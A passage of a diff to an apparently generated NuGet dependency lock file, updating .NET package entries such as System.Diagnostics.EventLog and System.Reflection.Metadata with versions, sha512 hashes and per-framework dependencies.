"netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "netstandard2.1": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Diagnostics.EventLog", "id": "System.Diagnostics.EventLog", "version": "7.0.0", "sha512": "sha512-m/H4Rg7KukGEmfRpl+rXU1UbMN3GYbv42cbMHRgMwHIiUL3svKoFFR76Fk/mHN5TgrwGx64fS0Fp+p3qICKg/Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Security.Principal.Windows"], "net462": ["System.Security.Principal.Windows"], "net47": ["System.Security.Principal.Windows"], "net471": ["System.Security.Principal.Windows"], "net472": ["System.Security.Principal.Windows"], "net48": ["System.Security.Principal.Windows"], "net5.0": ["System.Security.Principal.Windows"], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Security.Principal.Windows"], "netcoreapp2.1": ["System.Security.Principal.Windows"], "netcoreapp2.2": ["System.Security.Principal.Windows"], "netcoreapp3.0": ["System.Security.Principal.Windows"], "netcoreapp3.1": ["System.Security.Principal.Windows"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Security.Principal.Windows"], "netstandard2.1": ["System.Security.Principal.Windows"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Drawing.Common", "id": "System.Drawing.Common", "version": "7.0.0", "sha512": "sha512-0TJd5U26gRDgGa/rqABgHC5OBAiyl7Mm3pIzPgKfpmPXFQ8CFVWyGi+4mkEaCK715ViOBDkU2pC2nAiPunLw7Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": ["Microsoft.Win32.SystemEvents"], "net7.0": ["Microsoft.Win32.SystemEvents"], "net8.0": ["Microsoft.Win32.SystemEvents"], "net9.0": ["Microsoft.Win32.SystemEvents"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Configuration.ConfigurationManager", "id": "System.Configuration.ConfigurationManager", "version": "8.0.0", "sha512": "sha512-WLn7WxNMGs8+pboojHpid8CJiNhcr2j7kA0gmI8fgU5LF0JGKGqHhSSHc8WW0h77svQSS29KO+hr+xKeuS2J9A==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Security.Cryptography.ProtectedData"], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Security.Cryptography.ProtectedData"], "net6.0": ["System.Security.Cryptography.ProtectedData"], "net7.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "net8.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "net9.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Security.Cryptography.ProtectedData"], "netcoreapp2.1": ["System.Security.Cryptography.ProtectedData"], "netcoreapp2.2": ["System.Security.Cryptography.ProtectedData"], "netcoreapp3.0": ["System.Security.Cryptography.ProtectedData"], "netcoreapp3.1": ["System.Security.Cryptography.ProtectedData"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Security.Cryptography.ProtectedData"], "netstandard2.1": ["System.Security.Cryptography.ProtectedData"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Diagnostics.EventLog", "id": "System.Diagnostics.EventLog", "version": "8.0.0", "sha512": "sha512-um5/JzI6kqUKdoRX4qtIrMql36C6GQgspx2ntHO3HNO23QNuRC4Qn8Fe+7TCZ4gamEQJeuTt3Dy4hxUsjJURpQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.IO", "id": "System.IO", "version": "4.3.0", "sha512": "sha512-v8paIePhmGuXZbE9xvvNb4uJ5ME4OFXR1+8la/G/L1GIl2nbU2WFnddgb79kVK3U2us7q1aZT/uY/R0D/ovB5g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.IO.FileSystem", "id": "System.IO.FileSystem", "version": "4.3.0", "sha512": "sha512-T7WB1vhblSmgkaDpdGM3Uqo55Qsr5sip5eyowrwiXOoHBkzOx3ePd9+Zh97r9NzOwFCxqX7awO6RBxQuao7n7g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": ["System.IO.FileSystem.Primitives"], "net461": ["System.IO.FileSystem.Primitives"], "net462": ["System.IO.FileSystem.Primitives"], "net47": ["System.IO.FileSystem.Primitives"], "net471": ["System.IO.FileSystem.Primitives"], "net472": ["System.IO.FileSystem.Primitives"], "net48": ["System.IO.FileSystem.Primitives"], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.IO.FileSystem.Primitives", "id": "System.IO.FileSystem.Primitives", "version": "4.3.0", "sha512": "sha512-WIWVPQlYLP/Zc9I6IakpBk1y8ryVGK83MtZx//zGKKi2hvHQWKAB7moRQCOz5Is/wNDksiYpocf3FeA3le6e5Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Runtime"], "net6.0": ["System.Runtime"], "net7.0": ["System.Runtime"], "net8.0": ["System.Runtime"], "net9.0": ["System.Runtime"], "netcoreapp1.0": ["System.Runtime"], "netcoreapp1.1": ["System.Runtime"], "netcoreapp2.0": ["System.Runtime"], "netcoreapp2.1": ["System.Runtime"], "netcoreapp2.2": ["System.Runtime"], "netcoreapp3.0": ["System.Runtime"], "netcoreapp3.1": ["System.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["System.Runtime"], "netstandard1.4": ["System.Runtime"], "netstandard1.5": ["System.Runtime"], "netstandard1.6": ["System.Runtime"], "netstandard2.0": ["System.Runtime"], "netstandard2.1": ["System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.IO.Pipelines", "id": "System.IO.Pipelines", "version": "8.0.0", "sha512": "sha512-V+tqEehPQKSLV7HcV4agGqmFISK30VNjSQ2KEsmkWL+ZqN30wMAke+mFWcK0LnaaEL2ixamBdzVITZYNxlLrEg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.IO.Pipelines", "id": "System.IO.Pipelines", "version": "8.0.0", "sha512": "sha512-V+tqEehPQKSLV7HcV4agGqmFISK30VNjSQ2KEsmkWL+ZqN30wMAke+mFWcK0LnaaEL2ixamBdzVITZYNxlLrEg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net462": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net47": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net471": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net472": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net48": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net5.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Memory", "id": "System.Memory", "version": "4.5.5", "sha512": "sha512-6MjlNsl7lKw0Q8lAsw2tQ89ul9x6jD2Yk3EEj+dOFoYGOE9eAUO9wNhvd4O/n97oQXlkyzqKXXUnE+kLElFy3A==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net451": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net452": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net46": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net461": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp1.1": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.2": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.3": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.4": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.5": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.6": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.0": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Net.Primitives", "id": "System.Net.Primitives", "version": "4.3.1", "sha512": "sha512-BgdlyYCI7rrdh36p3lMTqbkvaafPETpB1bk9iQlFdQxYE692kiXvmseXs8ghL+gEgQF2xgDc8GH4QLkSgUUs+Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Reflection.Metadata", "id": "System.Reflection.Metadata", "version": "8.0.0", "sha512": "sha512-+6sMdkJjee0B6nm3AlBBl7cQaI0oPniLvvkrkFhmEN3fo/hGONaFdwpAaO+GRTlbZe4kRZzFwU7kSXQW0RyJxg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable"], "net462": ["System.Collections.Immutable"], "net47": ["System.Collections.Immutable"], "net471": ["System.Collections.Immutable"], "net472": ["System.Collections.Immutable"], "net48": ["System.Collections.Immutable"], "net5.0": ["System.Collections.Immutable"], "net6.0": ["System.Collections.Immutable"], "net7.0": ["System.Collections.Immutable"], "net8.0": ["System.Collections.Immutable"], "net9.0": ["System.Collections.Immutable"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable"], "netcoreapp2.1": ["System.Collections.Immutable"], "netcoreapp2.2": ["System.Collections.Immutable"], "netcoreapp3.0": ["System.Collections.Immutable"], "netcoreapp3.1": ["System.Collections.Immutable"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable"], "netstandard2.1": ["System.Collections.Immutable"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Reflection.MetadataLoadContext", "id": "System.Reflection.MetadataLoadContext", "version": "7.0.0", "sha512": "sha512-dqk0PmO2SGulqNpuJlALPc/5vqFVZc6As4ToHeZvd+6B/DomA1/JM1nAOpSU2hkBVytU0GlwsBr4YfKSnGSchg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net462": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net47": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net471": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net472": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net48": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net5.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net6.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net7.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp2.1": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp2.2": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp3.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp3.1": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netstandard2.1": ["System.Collections.Immutable", "System.Reflection.Metadata"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Numerics.Vectors", "id": "System.Numerics.Vectors", "version": "4.5.0", "sha512": "sha512-nATsBTD2CKr4AYN6eRszhX4sptImWmBJwB/U6XKCWWfnCcrTBw8XSCm3QA9gjppkHTr8OkXUY21MR91D3QZXsw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Reflection.Metadata", "id": "System.Reflection.Metadata", "version": "8.0.0", "sha512": "sha512-+6sMdkJjee0B6nm3AlBBl7cQaI0oPniLvvkrkFhmEN3fo/hGONaFdwpAaO+GRTlbZe4kRZzFwU7kSXQW0RyJxg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable", "System.Memory"], "net462": ["System.Collections.Immutable", "System.Memory"], "net47": ["System.Collections.Immutable", "System.Memory"], "net471": ["System.Collections.Immutable", "System.Memory"], "net472": ["System.Collections.Immutable", "System.Memory"], "net48": ["System.Collections.Immutable", "System.Memory"], "net5.0": ["System.Collections.Immutable", "System.Memory"], "net6.0": ["System.Collections.Immutable"], "net7.0": ["System.Collections.Immutable"], "net8.0": ["System.Collections.Immutable"], "net9.0": ["System.Collections.Immutable"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable", "System.Memory"], 